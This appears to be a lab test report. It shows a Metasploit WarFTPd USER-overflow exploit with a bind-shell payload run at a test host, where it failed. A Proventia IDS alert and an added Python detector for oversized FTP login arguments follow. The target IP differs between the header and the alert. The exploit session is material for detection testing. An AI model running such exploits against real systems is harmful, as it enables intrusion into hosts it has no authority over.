■Attack source

192.168.221.11 W2K

■Attack target

192.168.221.180 Win2K+English & WinXP+Japanese



■Impact

With the proof-of-concept code below, the attack failed and port 4444 on the target host did not open.



■Proof-of-concept code

msf warftpd_165_user(win32_bind) > show targets

Supported Exploit Targets
=========================

0 Windows 2000 SP0-SP4 English
1 Windows XP SP0-SP1 English
2 Windows XP SP2 English

msf warftpd_165_user(win32_bind) > show options

Exploit and Payload Options
===========================

Exploit: Name Default Description
-------- ------ --------------- ------------------
optional SSL Use SSL
required RHOST 192.168.221.180 The target address
required RPORT 21 The target port

Payload: Name Default Description
-------- -------- ------- ------------------------------------------

required EXITFUNC process Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell

Target: Windows 2000 SP0-SP4 English
msf warftpd_165_user(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying Windows 2000 SP0-SP4 English using return address 0x750231e2....
[*] 220 test-7nz5l7tfed Microsoft FTP Service (Version 5.0).
[*] Sending evil buffer....
[*] Exiting Bind Handler.


■Detection results on Proventia

Event Number : 1
Date/Time : 2006-01-15 12:17:52 JST
Tag Name : FTP_Login_Overflow
Alert Name : FTP_Login_Overflow
Severity : High
Tag Brief Description :
Observance Type : Intrusion Detection
Combined Event Count : 1
Cleared Flag : No
Target DNS Name :
Target IP Address : 192.168.37.180
Target Object Name : 21
Target Object Type : Target Port
Target Service :
Source DNS Name :
Source IP Address : 192.168.221.11
SourcePort Name : 2123
Sensor DNS Name :
Sensor IP Address : 192.168.221.11
Sensor Name : network_sensor_1

Attribute Value Pairs for Event Number : 1
Attribute Name : :cmd
Attribute Value : USER
Attribute Name : :Coalescer_Info
Attribute Value : Update Pending
Attribute Name : :intruder-ip-addr
Attribute Value : 192.168.221.11
Attribute Name : :intruder-port
Attribute Value : 2123
Attribute Name : :length
Attribute Value : 1112
Attribute Name : :pam.login.maxname
Attribute Value : 100
Attribute Name : :user
Attribute Value : ・・・OJ・??/妁K汾剴檳劔OA・NCB汨AGNO・適A羨炉/77泱N?CO・Gw_.qィ澤_サMムUスuゞスJム・w-ン鰉モ・u錞澑晶・タ謂VV.マ閊4?.ノヤ
Attribute Name : :victim-ip-addr
Attribute Value : 192.168.37.180
Attribute Name : :victim-port
Attribute Value : 21
Attribute Name : algorithm-id
Attribute Value : 2001306
Attribute Name : IANAProtocolId
Attribute Value : 6
Attribute Name : Packet DestinationAddress
Attribute Value : 192.168.37.180
Attribute Name : Packet DestinationPort
Attribute Value : 21
Attribute Name : Packet DestinationPortName
Attribute Value : ftp
Attribute Name : Packet SourceAddress
Attribute Value : 192.168.221.11
Attribute Name : Packet SourcePort
Attribute Value : 2123
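
The alert above reports a USER command (:cmd) whose :length of 1112 exceeds the :pam.login.maxname value of 100. The following is an added example, not part of the original page and not the sensor's actual algorithm, that applies the same kind of length check to a constructed FTP control stream. The function names, the inclusion of PASS, and the reading of :length as the argument's byte count are assumptions.

```python
# Added example: length check on FTP login commands, modelled on the alert fields above.
# Not the sensor's real algorithm; names and sample traffic are constructed.
MAX_NAME = 100                      # from the alert's pam.login.maxname value
LOGIN_CMDS = {b"USER", b"PASS"}     # assumption: check both login commands


def split_commands(stream: bytes):
    """Yield (line, terminated) for each FTP control-channel line in a byte stream."""
    while stream:
        line, sep, stream = stream.partition(b"\n")
        yield line.rstrip(b"\r"), bool(sep)


def inspect(stream: bytes, src: str, dst: str, max_name: int = MAX_NAME):
    """Return one alert dict per login command whose argument exceeds max_name bytes."""
    alerts = []
    for line, terminated in split_commands(stream):
        verb, _, arg = line.partition(b" ")
        verb = verb.upper()         # FTP command verbs are case-insensitive
        if verb not in LOGIN_CMDS or len(arg) <= max_name:
            continue
        alerts.append({
            "tag": "FTP_Login_Overflow",
            "cmd": verb.decode("ascii"),
            "length": len(arg),
            "maxname": max_name,
            "intruder": src,
            "victim": dst,
            # Non-printable bytes are why the :user value above is unreadable;
            # log a hex prefix instead of decoding the argument as text.
            "arg_prefix_hex": arg[:16].hex(),
            "terminated": terminated,  # False: oversized argument with no CRLF yet
        })
    return alerts


# Constructed sample traffic: a normal login, then an oversized USER argument
# (filler bytes only) of the same length the alert reports.
SAMPLE = (
    b"USER anonymous\r\n"
    b"PASS guest@example.invalid\r\n"
    b"user " + b"\xa5" * 1112 + b"\r\n"
)

if __name__ == "__main__":
    for alert in inspect(SAMPLE, "192.168.221.11:2123", "192.168.37.180:21"):
        print(alert)
```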